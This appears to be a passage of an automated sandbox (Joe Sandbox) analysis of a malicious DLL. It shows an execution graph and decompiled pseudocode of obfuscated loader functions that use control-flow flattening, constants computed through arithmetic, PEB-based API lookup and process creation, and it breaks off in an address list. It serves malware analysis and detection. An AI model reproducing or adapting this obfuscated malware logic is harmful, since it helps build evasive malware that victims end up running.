                                                                        execution_graph 4603 2608d0 4604 2608ed 4603->4604 4609 25ff50 4604->4609 4606 26097c 4612 260530 VirtualAlloc 4606->4612 4608 2609b3 4610 25ff91 4609->4610 4611 25ffc4 VirtualAlloc 4610->4611 4611->4606 4613 26058e 4612->4613 4614 260615 UnmapViewOfFile VirtualAlloc 4613->4614 4616 260650 4614->4616 4615 26077d 4615->4608 4616->4615 4617 260752 VirtualProtect 4616->4617 4617->4616 4618 1001ba39 4619 1001bab3 4618->4619 4623 1001bad6 4618->4623 4624 10017d7d 4619->4624 4635 1001833c 4624->4635 4625 1001bf25 GetPEB 4625->4635 4627 10018548 4648 100189f6 4627->4648 4631 1001c5f7 GetPEB 4631->4635 4632 10018546 4632->4623 4637 1000cd27 4632->4637 4635->4625 4635->4627 4635->4631 4635->4632 4640 10001d54 4635->4640 4644 1000d867 4635->4644 4658 10008c0c 4635->4658 4662 100163bf 4635->4662 4666 10001cb3 4635->4666 4670 1001b8e7 4635->4670 4638 100104d5 GetPEB 4637->4638 4639 1000cdc5 ExitProcess 4638->4639 4639->4623 4641 10001d78 4640->4641 4673 100104d5 4641->4673 4645 1000d883 4644->4645 4646 100104d5 GetPEB 4645->4646 4647 1000d8f3 lstrcmpiW 4646->4647 4647->4635 4649 10018a23 4648->4649 4650 10001cb3 GetPEB 4649->4650 4651 10018c0c 4650->4651 4703 1001f2f9 4651->4703 4653 10018c3e 4654 10018c49 4653->4654 4707 100078f0 4653->4707 4654->4632 4657 100078f0 GetPEB 4657->4654 4659 10008c26 4658->4659 4711 1000d376 4659->4711 4663 100163e4 4662->4663 4715 1001da92 4663->4715 4667 10001cc6 4666->4667 4718 1001d15d 4667->4718 4671 100104d5 GetPEB 4670->4671 4672 1001b978 4671->4672 4672->4635 4674 100105a9 4673->4674 4675 10001e00 SHGetFolderPathW 4673->4675 4679 10018d49 4674->4679 4675->4635 4677 100105bc 4682 10002419 4677->4682 4686 10001d4d GetPEB 4679->4686 4681 10018dbf 4681->4677 4683 1000243e 4682->4683 4685 1000253f 4683->4685 4687 1001c6ad 4683->4687 4685->4675 4686->4681 4688 1001c877 4687->4688 4695 10015719 4688->4695 4691 1001c8c2 4693 1001c8f8 4691->4693 4694 10002419 GetPEB 4691->4694 4693->4685 4694->4693 4696 1001572f 4695->4696 4697 100104d5 GetPEB 4696->4697 4698 100157dc 4697->4698 4698->4691 4699 10018df5 4698->4699 4700 10018e0e 4699->4700 4701 100104d5 GetPEB 4700->4701 4702 10018e99 4701->4702 4702->4691 4704 1001f32b 4703->4704 4705 100104d5 GetPEB 4704->4705 4706 1001f3cb CreateProcessW 4705->4706 4706->4653 4708 10007909 4707->4708 4709 100104d5 GetPEB 4708->4709 4710 10007997 4709->4710 4710->4657 4712 1000d39b 4711->4712 4713 100104d5 GetPEB 4712->4713 4714 10008c99 4713->4714 4714->4635 4716 100104d5 GetPEB 4715->4716 4717 10016401 4716->4717 4717->4635 4719 1001d179 4718->4719 4722 1000783b 4719->4722 4723 10007850 4722->4723 4724 100104d5 GetPEB 4723->4724 4725 10001d46 4724->4725 4725->4635

                                                                        Executed Functions

                                                                        Function 10017D7D, Relevance: 17.9, Strings: 14, Instructions: 374COMMONCrypto
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 92%
                                                                        			E10017D7D() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _t406;
				signed short* _t408;
				signed int _t423;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				signed int _t441;
				signed int* _t470;
				signed int* _t471;
				signed short* _t477;
				signed int* _t478;

				_t478 =  &_v1720;
				_v1632 = 0x717f;
				_v1632 = _v1632 + 0xffff0b69;
				_v1632 = _v1632 + 0xffff4bbd;
				_v1632 = _v1632 ^ 0xfffec88c;
				_v1624 = 0x5b3d;
				_t425 = 0x4e;
				_v1624 = _v1624 / _t425;
				_v1624 = _v1624 + 0x3b40;
				_t423 = 0;
				_v1624 = _v1624 ^ 0x00006b1e;
				_t471 = 0x22ae8e06;
				_v1704 = 0xcbd5;
				_v1704 = _v1704 >> 6;
				_t426 = 0x17;
				_v1704 = _v1704 / _t426;
				_v1704 = _v1704 + 0x2ad9;
				_v1704 = _v1704 ^ 0x00003123;
				_v1580 = 0xdbf5;
				_t427 = 0x5c;
				_v1580 = _v1580 * 0x1b;
				_v1580 = _v1580 ^ 0x00173f74;
				_v1648 = 0x65d6;
				_v1648 = _v1648 + 0x84b1;
				_v1648 = _v1648 * 0x12;
				_v1648 = _v1648 ^ 0x00101fbb;
				_v1696 = 0x93ca;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 / _t427;
				_v1696 = _v1696 + 0xffff60cf;
				_v1696 = _v1696 ^ 0xffffe2d0;
				_v1568 = 0x4939;
				_v1568 = _v1568 + 0xaf0f;
				_v1568 = _v1568 ^ 0x0000d95a;
				_v1620 = 0x1fb;
				_v1620 = _v1620 | 0x860de658;
				_v1620 = _v1620 + 0xffff792b;
				_v1620 = _v1620 ^ 0x860d467d;
				_v1628 = 0x991f;
				_v1628 = _v1628 << 0xb;
				_v1628 = _v1628 + 0x8561;
				_v1628 = _v1628 ^ 0x04c95d8c;
				_v1688 = 0xc5a8;
				_t428 = 0xf;
				_v1688 = _v1688 * 0x46;
				_v1688 = _v1688 / _t428;
				_t429 = 0x21;
				_v1688 = _v1688 * 0x33;
				_v1688 = _v1688 ^ 0x00b7e901;
				_v1636 = 0x9981;
				_v1636 = _v1636 / _t429;
				_v1636 = _v1636 >> 8;
				_v1636 = _v1636 ^ 0x00005b8d;
				_v1672 = 0x4c1b;
				_v1672 = _v1672 << 3;
				_v1672 = _v1672 | 0xb8c6078b;
				_v1672 = _v1672 + 0xfffffa1e;
				_v1672 = _v1672 ^ 0xb8c64f7e;
				_v1680 = 0x7507;
				_v1680 = _v1680 ^ 0xfc87d912;
				_t430 = 0x57;
				_v1680 = _v1680 / _t430;
				_v1680 = _v1680 | 0x52ab30fe;
				_v1680 = _v1680 ^ 0x52ef22cb;
				_v1572 = 0xd7cd;
				_v1572 = _v1572 >> 1;
				_v1572 = _v1572 ^ 0x00004425;
				_v1612 = 0x327c;
				_t431 = 0x4a;
				_v1612 = _v1612 / _t431;
				_v1612 = _v1612 << 9;
				_v1612 = _v1612 ^ 0x000105f8;
				_v1684 = 0xeedb;
				_v1684 = _v1684 | 0xb4487ed8;
				_v1684 = _v1684 + 0xffffe615;
				_v1684 = _v1684 * 0x61;
				_v1684 = _v1684 ^ 0x4f9e85a0;
				_v1708 = 0xa411;
				_v1708 = _v1708 >> 0xb;
				_v1708 = _v1708 >> 0xc;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 ^ 0x00001027;
				_v1652 = 0x5fa;
				_v1652 = _v1652 * 0x15;
				_v1652 = _v1652 | 0x0889c09d;
				_v1652 = _v1652 ^ 0x0889d75f;
				_v1676 = 0xabed;
				_v1676 = _v1676 << 2;
				_v1676 = _v1676 + 0xffffe0e5;
				_v1676 = _v1676 ^ 0x9631fc90;
				_v1676 = _v1676 ^ 0x963327ba;
				_v1716 = 0x2f0;
				_v1716 = _v1716 >> 0xe;
				_v1716 = _v1716 >> 0xf;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 ^ 0x00005632;
				_v1668 = 0xb719;
				_v1668 = _v1668 >> 0xf;
				_v1668 = _v1668 | 0x7bbc307b;
				_v1668 = _v1668 ^ 0x1874fdff;
				_v1668 = _v1668 ^ 0x63c8a7db;
				_v1700 = 0xf68;
				_v1700 = _v1700 * 0x3d;
				_v1700 = _v1700 * 0x5e;
				_v1700 = _v1700 ^ 0xc3b802d4;
				_v1700 = _v1700 ^ 0xc2e14722;
				_v1604 = 0xf526;
				_v1604 = _v1604 | 0xfb865dd6;
				_v1604 = _v1604 << 0x10;
				_v1604 = _v1604 ^ 0xfdf60e11;
				_v1692 = 0xe7a5;
				_v1692 = _v1692 >> 9;
				_v1692 = _v1692 * 0x69;
				_v1692 = _v1692 + 0xffffa091;
				_v1692 = _v1692 ^ 0xffffa346;
				_v1644 = 0xfb3a;
				_v1644 = _v1644 << 0xf;
				_v1644 = _v1644 | 0x145f0355;
				_v1644 = _v1644 ^ 0x7ddf4d76;
				_v1640 = 0x8cc2;
				_v1640 = _v1640 | 0xffda9e59;
				_v1640 = _v1640 ^ 0xffdaa737;
				_v1608 = 0x435c;
				_v1608 = _v1608 ^ 0x551376dd;
				_v1608 = _v1608 << 7;
				_v1608 = _v1608 ^ 0x899af7ad;
				_v1588 = 0xd652;
				_t432 = 0x1c;
				_v1588 = _v1588 / _t432;
				_v1588 = _v1588 ^ 0x000058ee;
				_v1720 = 0xa7dc;
				_v1720 = _v1720 ^ 0x05a38014;
				_t433 = 0x5b;
				_v1720 = _v1720 / _t433;
				_v1720 = _v1720 + 0xfffffd60;
				_v1720 = _v1720 ^ 0x000fa20d;
				_v1576 = 0xb9c2;
				_v1576 = _v1576 * 0x73;
				_v1576 = _v1576 ^ 0x0053500f;
				_v1596 = 0x70f2;
				_v1596 = _v1596 ^ 0x2104d0ae;
				_v1596 = _v1596 ^ 0x2104d823;
				_v1616 = 0x5963;
				_v1616 = _v1616 << 9;
				_v1616 = _v1616 ^ 0x4dab58e4;
				_v1616 = _v1616 ^ 0x4d19c9be;
				_v1564 = 0xedf5;
				_v1564 = _v1564 + 0xa5f4;
				_v1564 = _v1564 ^ 0x0001b6b3;
				_v1660 = 0x832e;
				_v1660 = _v1660 + 0xffff50b4;
				_v1660 = _v1660 >> 5;
				_v1660 = _v1660 ^ 0x07ffee80;
				_v1712 = 0x8701;
				_v1712 = _v1712 ^ 0x095342ef;
				_v1712 = _v1712 ^ 0x499570f7;
				_v1712 = _v1712 << 6;
				_v1712 = _v1712 ^ 0x31ad5d39;
				_v1664 = 0x5186;
				_v1664 = _v1664 * 0x48;
				_v1664 = _v1664 + 0xffff7e0d;
				_v1664 = _v1664 + 0xfc6;
				_v1664 = _v1664 ^ 0x00162065;
				_v1600 = 0x4362;
				_v1600 = _v1600 + 0xffff7a4f;
				_v1600 = _v1600 ^ 0xffff8bd1;
				_t477 = _v1600;
				_v1584 = 0x3cb6;
				_v1584 = _v1584 << 2;
				_v1584 = _v1584 ^ 0x0000d772;
				_v1656 = 0x7847;
				_v1656 = _v1656 * 0x76;
				_v1656 = _v1656 >> 7;
				_v1656 = _v1656 ^ 0x00002d73;
				_v1592 = 0x219b;
				_v1592 = _v1592 + 0x5ed0;
				_v1592 = _v1592 ^ 0x0000e1f1;
				while(_t471 != 0x5dac24b) {
					if(_t471 == 0x94e3c78) {
						_t408 = _t477;
						__eflags =  *_t477 - _t423;
						while(__eflags != 0) {
							__eflags =  *_t408 - 0x2c;
							if( *_t408 == 0x2c) {
								_t470 =  &_v1560;
								while(1) {
									_t408 =  &(_t408[1]);
									_t441 =  *_t408 & 0x0000ffff;
									__eflags = _t441;
									if(_t441 == 0) {
										break;
									}
									__eflags = _t441 - 0x20;
									if(_t441 != 0x20) {
										 *_t470 = _t441;
										_t470 =  &(_t470[0]);
										__eflags = _t470;
										continue;
									}
									break;
								}
								_t433 = 0;
								__eflags = 0;
								 *_t470 = 0;
							}
							_t408 =  &(_t408[1]);
							__eflags =  *_t408 - _t423;
						}
						_t471 = 0x5dac24b;
						continue;
					} else {
						if(_t471 == 0x1d31c645) {
							_t477 = E1001B8E7();
							_t471 = 0x94e3c78;
							continue;
						} else {
							if(_t471 == 0x1e27a3c8) {
								_push(_v1592);
								_push(_t423);
								_push(_t477);
								_push(_t433);
								_push(_v1656);
								_push(_v1584);
								_push(_t423);
								_push(_t423);
								E100189F6(_v1664, _v1600, __eflags);
								_t423 = 1;
								__eflags = 1;
							} else {
								if(_t471 == 0x22ae8e06) {
									E10001CB3( &_v1560, _v1624, 0x208, _v1704);
									_pop(_t433);
									_t471 = 0x1d31c645;
									continue;
								} else {
									_t487 = _t471 - 0x2f70a4dc;
									if(_t471 != 0x2f70a4dc) {
										L20:
										__eflags = _t471 - 0xa4cd945;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_push(_t433);
										E10001D54(_v1684, _t433, _v1708, _v1652, _v1676,  &_v520, _v1716, _v1632); // executed
										E10008C0C(_v1668, _t487, _v1700, _v1604,  &_v1040);
										_push(0x100012c0);
										_push(_v1640);
										E100163BF(E1001BF25(_v1692, _v1644, _t487), _t487, _v1588, _v1720, _t477, _v1692, _v1576,  &_v520,  &_v1040, _v1596);
										_t433 = _v1616;
										E1001C5F7(_t433, _v1564, _v1660, _v1712, _t418);
										_t478 =  &(_t478[0x18]);
										_t471 = 0x1e27a3c8;
										continue;
									}
								}
							}
						}
					}
					return _t423;
				}
				_push(0x10001290);
				_push(_v1568);
				_t406 = E1000D867(E1001BF25(_v1648, _v1696, __eflags), _v1620,  &_v1560, _v1628, _v1688, _v1636); // executed
				asm("sbb edi, edi");
				_t433 = _v1672;
				_t471 = ( ~_t406 & 0x2523cb97) + 0xa4cd945;
				__eflags = _t471;
				E1001C5F7(_t433, _v1680, _v1572, _v1612, _t404);
				_t478 =  &(_t478[9]);
				goto L20;
			}































































                                                                        0x10017d7d
                                                                        0x10017d83
                                                                        0x10017d8d
                                                                        0x10017d95
                                                                        0x10017d9d
                                                                        0x10017da5
                                                                        0x10017db7
                                                                        0x10017dbc
                                                                        0x10017dc2
                                                                        0x10017dca
                                                                        0x10017dcc
                                                                        0x10017dd4
                                                                        0x10017dd9
                                                                        0x10017de1
                                                                        0x10017dea
                                                                        0x10017def
                                                                        0x10017df5
                                                                        0x10017dfd
                                                                        0x10017e05
                                                                        0x10017e18
                                                                        0x10017e1b
                                                                        0x10017e22
                                                                        0x10017e2d
                                                                        0x10017e35
                                                                        0x10017e42
                                                                        0x10017e46
                                                                        0x10017e4e
                                                                        0x10017e5b
                                                                        0x10017e67
                                                                        0x10017e6b
                                                                        0x10017e73
                                                                        0x10017e7b
                                                                        0x10017e86
                                                                        0x10017e91
                                                                        0x10017e9c
                                                                        0x10017ea4
                                                                        0x10017eac
                                                                        0x10017eb4
                                                                        0x10017ebc
                                                                        0x10017ec4
                                                                        0x10017ec9
                                                                        0x10017ed1
                                                                        0x10017ed9
                                                                        0x10017ee6
                                                                        0x10017ee9
                                                                        0x10017ef5
                                                                        0x10017efe
                                                                        0x10017eff
                                                                        0x10017f03
                                                                        0x10017f0b
                                                                        0x10017f19
                                                                        0x10017f1d
                                                                        0x10017f22
                                                                        0x10017f2a
                                                                        0x10017f34
                                                                        0x10017f39
                                                                        0x10017f41
                                                                        0x10017f49
                                                                        0x10017f51
                                                                        0x10017f59
                                                                        0x10017f67
                                                                        0x10017f6c
                                                                        0x10017f72
                                                                        0x10017f7a
                                                                        0x10017f82
                                                                        0x10017f8d
                                                                        0x10017f94
                                                                        0x10017f9f
                                                                        0x10017fb1
                                                                        0x10017fb4
                                                                        0x10017fb8
                                                                        0x10017fbd
                                                                        0x10017fc5
                                                                        0x10017fcd
                                                                        0x10017fd5
                                                                        0x10017fe2
                                                                        0x10017fe6
                                                                        0x10017fee
                                                                        0x10017ff6
                                                                        0x10017ffb
                                                                        0x10018000
                                                                        0x10018005
                                                                        0x1001800d
                                                                        0x1001801a
                                                                        0x1001801e
                                                                        0x10018026
                                                                        0x1001802e
                                                                        0x10018036
                                                                        0x1001803b
                                                                        0x10018043
                                                                        0x1001804b
                                                                        0x10018053
                                                                        0x1001805b
                                                                        0x10018060
                                                                        0x10018065
                                                                        0x1001806a
                                                                        0x10018072
                                                                        0x1001807a
                                                                        0x1001807f
                                                                        0x10018087
                                                                        0x1001808f
                                                                        0x10018097
                                                                        0x100180a4
                                                                        0x100180ad
                                                                        0x100180b1
                                                                        0x100180b9
                                                                        0x100180c1
                                                                        0x100180cc
                                                                        0x100180d7
                                                                        0x100180df
                                                                        0x100180ea
                                                                        0x100180f2
                                                                        0x100180fc
                                                                        0x10018100
                                                                        0x10018108
                                                                        0x10018110
                                                                        0x10018118
                                                                        0x1001811d
                                                                        0x10018125
                                                                        0x1001812d
                                                                        0x10018135
                                                                        0x1001813d
                                                                        0x10018147
                                                                        0x10018152
                                                                        0x1001815d
                                                                        0x10018165
                                                                        0x10018170
                                                                        0x10018184
                                                                        0x10018189
                                                                        0x10018192
                                                                        0x1001819d
                                                                        0x100181a5
                                                                        0x100181b1
                                                                        0x100181b4
                                                                        0x100181b8
                                                                        0x100181c0
                                                                        0x100181c8
                                                                        0x100181db
                                                                        0x100181e2
                                                                        0x100181ed
                                                                        0x100181f8
                                                                        0x10018203
                                                                        0x1001820e
                                                                        0x10018216
                                                                        0x1001821b
                                                                        0x10018223
                                                                        0x1001822b
                                                                        0x10018236
                                                                        0x10018241
                                                                        0x1001824c
                                                                        0x10018254
                                                                        0x1001825c
                                                                        0x10018261
                                                                        0x10018269
                                                                        0x10018271
                                                                        0x10018279
                                                                        0x10018281
                                                                        0x10018286
                                                                        0x1001828e
                                                                        0x1001829b
                                                                        0x1001829f
                                                                        0x100182a7
                                                                        0x100182af
                                                                        0x100182b7
                                                                        0x100182c2
                                                                        0x100182cd
                                                                        0x100182d8
                                                                        0x100182df
                                                                        0x100182ea
                                                                        0x100182f2
                                                                        0x100182fd
                                                                        0x1001830a
                                                                        0x1001830e
                                                                        0x10018313
                                                                        0x1001831b
                                                                        0x10018326
                                                                        0x10018331
                                                                        0x1001833c
                                                                        0x1001834e
                                                                        0x10018487
                                                                        0x10018489
                                                                        0x1001848d
                                                                        0x1001848f
                                                                        0x10018493
                                                                        0x10018495
                                                                        0x100184aa
                                                                        0x100184aa
                                                                        0x100184ad
                                                                        0x100184b0
                                                                        0x100184b3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001849e
                                                                        0x100184a2
                                                                        0x100184a4
                                                                        0x100184a7
                                                                        0x100184a7
                                                                        0x00000000
                                                                        0x100184a7
                                                                        0x00000000
                                                                        0x100184a2
                                                                        0x100184b5
                                                                        0x100184b5
                                                                        0x100184b7
                                                                        0x100184b7
                                                                        0x100184ba
                                                                        0x100184bd
                                                                        0x100184bd
                                                                        0x100184c2
                                                                        0x00000000
                                                                        0x10018354
                                                                        0x1001835a
                                                                        0x1001847b
                                                                        0x1001847d
                                                                        0x00000000
                                                                        0x10018360
                                                                        0x10018366
                                                                        0x10018548
                                                                        0x1001854f
                                                                        0x10018550
                                                                        0x10018551
                                                                        0x10018552
                                                                        0x10018556
                                                                        0x10018568
                                                                        0x10018569
                                                                        0x1001856a
                                                                        0x10018574
                                                                        0x10018574
                                                                        0x1001836c
                                                                        0x10018372
                                                                        0x1001845e
                                                                        0x10018464
                                                                        0x10018465
                                                                        0x00000000
                                                                        0x10018378
                                                                        0x10018378
                                                                        0x1001837e
                                                                        0x1001853a
                                                                        0x1001853a
                                                                        0x10018540
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018546
                                                                        0x10018384
                                                                        0x10018384
                                                                        0x100183a6
                                                                        0x100183c2
                                                                        0x100183c7
                                                                        0x100183cc
                                                                        0x1001841c
                                                                        0x10018431
                                                                        0x10018438
                                                                        0x1001843d
                                                                        0x10018440
                                                                        0x00000000
                                                                        0x10018440
                                                                        0x1001837e
                                                                        0x10018372
                                                                        0x10018366
                                                                        0x1001835a
                                                                        0x10018581
                                                                        0x10018581
                                                                        0x100184cc
                                                                        0x100184d1
                                                                        0x10018504
                                                                        0x10018515
                                                                        0x10018528
                                                                        0x1001852c
                                                                        0x1001852c
                                                                        0x10018532
                                                                        0x10018537
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #1$%D$2V$9I$=[$@;$\C$bC$cY$s-$x<N$x<N$BS$X
                                                                        • API String ID: 0-3306313712
                                                                        • Opcode ID: 24a479cb9960130481b5e0a16401e8a496e826423d3935e462d2cd1cf3aa2df0
                                                                        • Instruction ID: 6a1dd99ac0dae1f7e91fa6a7f4389cb019a1ae11d87d1325dd7d5c9d98885180
                                                                        • Opcode Fuzzy Hash: 24a479cb9960130481b5e0a16401e8a496e826423d3935e462d2cd1cf3aa2df0
                                                                        • Instruction Fuzzy Hash: 061223715093819FE3A4CF25C94AA4BBBF1FBC1748F50891DE1D9862A0D7B59A49CF03
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 100189F6, Relevance: 1.4, Strings: 1, Instructions: 178COMMONCrypto
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 116 100189f6-10018c39 call 100056b2 call 10001cb3 call 1001f2f9 122 10018c3e-10018c43 116->122 123 10018c82 122->123 124 10018c45-10018c47 122->124 127 10018c84-10018c8a 123->127 125 10018c55-10018c80 call 100078f0 * 2 124->125 126 10018c49-10018c4f 124->126 128 10018c50-10018c53 125->128 126->128 128->127
                                                                        C-Code - Quality: 84%
                                                                        			E100189F6(void* __ecx, void* __edx, void* __eflags) {
				intOrPtr _t179;
				void* _t198;
				void* _t199;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				intOrPtr _t230;
				signed int _t233;
				intOrPtr* _t236;
				void* _t237;

				_t236 = _t237 - 0x58;
				_push( *((intOrPtr*)(_t236 + 0x7c)));
				_t230 =  *((intOrPtr*)(_t236 + 0x60));
				_push( *((intOrPtr*)(_t236 + 0x78)));
				_push( *((intOrPtr*)(_t236 + 0x74)));
				_push(0);
				_push( *((intOrPtr*)(_t236 + 0x6c)));
				_push( *((intOrPtr*)(_t236 + 0x68)));
				_push( *((intOrPtr*)(_t236 + 0x64)));
				_push(_t230);
				_push(__edx);
				_t179 = E100056B2(0);
				 *((intOrPtr*)(_t236 + 0x10)) = _t179;
				 *((intOrPtr*)(_t236 + 0x14)) = _t179;
				 *((intOrPtr*)(_t236 + 0xc)) = 0x631fbb;
				 *(_t236 + 0x18) = 0xabd8;
				 *(_t236 + 0x18) =  *(_t236 + 0x18) >> 0xa;
				 *(_t236 + 0x18) =  *(_t236 + 0x18) ^ 0x000028bc;
				 *(_t236 + 0x50) = 0x6039;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) >> 3;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) + 0xffff0189;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) | 0x7d810f7b;
				 *(_t236 + 0x50) =  *(_t236 + 0x50) ^ 0xffff162f;
				 *(_t236 + 0x28) = 0x1c47;
				 *(_t236 + 0x28) =  *(_t236 + 0x28) >> 0xc;
				 *(_t236 + 0x28) =  *(_t236 + 0x28) ^ 0x0000518a;
				 *(_t236 + 0x54) = 0x88f7;
				_t204 = 0x7a;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t204;
				_t205 = 0x2f;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) / _t205;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) | 0x955efb45;
				 *(_t236 + 0x54) =  *(_t236 + 0x54) ^ 0x955eaba7;
				 *(_t236 + 0x34) = 0x5d88;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) | 0x01d5b93d;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) + 0xffff1061;
				 *(_t236 + 0x34) =  *(_t236 + 0x34) ^ 0x01d50dda;
				 *(_t236 + 0x20) = 0xe64c;
				_t206 = 0x3c;
				 *(_t236 + 0x20) =  *(_t236 + 0x20) * 0x1a;
				 *(_t236 + 0x20) =  *(_t236 + 0x20) ^ 0x00172033;
				 *(_t236 + 0x48) = 0x78d;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 5;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) >> 3;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) << 7;
				 *(_t236 + 0x48) =  *(_t236 + 0x48) ^ 0x00004d2d;
				 *(_t236 + 0x40) = 0xdd42;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) | 0x71435ab3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) >> 3;
				 *(_t236 + 0x40) =  *(_t236 + 0x40) ^ 0x01c527a4;
				 *(_t236 + 0x1c) = 0xfe37;
				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) / _t206;
				 *(_t236 + 0x1c) =  *(_t236 + 0x1c) ^ 0x00000b23;
				 *(_t236 + 0x44) = 0x813f;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0x228;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) + 0xffff0885;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0xc0b9d21a;
				 *(_t236 + 0x44) =  *(_t236 + 0x44) ^ 0x3f462949;
				 *(_t236 + 0x30) = 0xaa8;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xffffc1ea;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) + 0xcc5a;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) ^ 0x0000b9ca;
				 *(_t236 + 0x4c) = 0xb208;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0x21;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x1e109f47;
				_t233 = 0x44;
				_t207 = 0x22;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) * 0xb;
				 *(_t236 + 0x4c) =  *(_t236 + 0x4c) ^ 0x4a46f378;
				 *(_t236 + 0x24) = 0x5fb2;
				 *(_t236 + 0x24) =  *(_t236 + 0x24) >> 6;
				 *(_t236 + 0x24) =  *(_t236 + 0x24) ^ 0x00007116;
				 *(_t236 + 0x2c) = 0x59ee;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) << 0xb;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) / _t233;
				 *(_t236 + 0x2c) =  *(_t236 + 0x2c) ^ 0x000a9b68;
				 *(_t236 + 0x38) = 0x60ae;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) / _t207;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) << 1;
				 *(_t236 + 0x38) =  *(_t236 + 0x38) ^ 0x00001475;
				 *(_t236 + 0x3c) = 0x510d;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) << 0xb;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) | 0x23cc3b8a;
				_t208 = 0x4c;
				_t149 = _t236 - 0x48; // 0xfffec844
				_t209 = _t149;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) / _t208;
				 *(_t236 + 0x3c) =  *(_t236 + 0x3c) ^ 0x0078f0f6;
				E10001CB3(_t149,  *(_t236 + 0x18), _t233,  *(_t236 + 0x50));
				 *(_t236 - 0x48) = _t233;
				_t156 = _t236 - 4; // 0xfffec888
				_t158 = _t236 - 0x48; // 0xfffec844
				_t198 = E1001F2F9( *(_t236 + 0x28), _t149,  *((intOrPtr*)(_t236 + 0x64)),  *((intOrPtr*)(_t236 + 0x74)),  *((intOrPtr*)(_t236 + 0x78)), _t158,  *(_t236 + 0x54),  *(_t236 + 0x34), _t209,  *(_t236 + 0x20),  *(_t236 + 0x48),  *(_t236 + 0x40), _t209, _t209, _t156); // executed
				if(_t198 == 0) {
					_t199 = 0;
				} else {
					if(_t230 == 0) {
						E100078F0( *((intOrPtr*)(_t236 - 4)),  *(_t236 + 0x1c),  *(_t236 + 0x44),  *(_t236 + 0x30),  *(_t236 + 0x4c));
						E100078F0( *_t236,  *(_t236 + 0x24),  *(_t236 + 0x2c),  *(_t236 + 0x38),  *(_t236 + 0x3c));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t199 = 1;
				}
				return _t199;
			}















                                                                        0x100189f7
                                                                        0x10018a03
                                                                        0x10018a06
                                                                        0x10018a0b
                                                                        0x10018a0e
                                                                        0x10018a11
                                                                        0x10018a12
                                                                        0x10018a15
                                                                        0x10018a18
                                                                        0x10018a1b
                                                                        0x10018a1c
                                                                        0x10018a1e
                                                                        0x10018a23
                                                                        0x10018a28
                                                                        0x10018a2b
                                                                        0x10018a32
                                                                        0x10018a39
                                                                        0x10018a3d
                                                                        0x10018a44
                                                                        0x10018a4b
                                                                        0x10018a4f
                                                                        0x10018a56
                                                                        0x10018a5d
                                                                        0x10018a64
                                                                        0x10018a6b
                                                                        0x10018a6f
                                                                        0x10018a76
                                                                        0x10018a82
                                                                        0x10018a87
